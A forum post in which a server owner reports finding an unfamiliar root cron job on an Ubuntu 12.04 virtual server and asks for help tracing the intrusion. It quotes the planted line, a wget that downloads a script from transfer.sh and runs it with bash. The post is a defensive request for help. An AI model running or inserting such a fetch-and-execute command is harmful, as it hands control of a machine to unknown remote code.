I set up a new virtual server a couple of days ago. I installed some open source software on it from a reputable company. I was running 12.04 (64 bit), since that's the supported OS the software ran on. I updated the base installation with the most recent packages using upgrade and dist-upgrade.
Today, I was setting up cron as root to run some tasks, and I saw some very suspicious code I was not familiar with, which loaded a script from https://transfer.sh.
Specifically, this was one line of code in the cron job:
Code:
wget -O .cmd https://transfer.sh/ioAzh/tmp.Ker9jozIal && bash .cmd
It looks like an attempt to gather data from my server, but I'm not quite sure what specifically.
I've shut the server down now, but I'd still like to run this software. It uses Python and runs a hosted webserver.
How can I figure out what led to this situation? Any insight on what they were attempting to take? How do I ensure this doesn't happen again in the future?
Bookmarks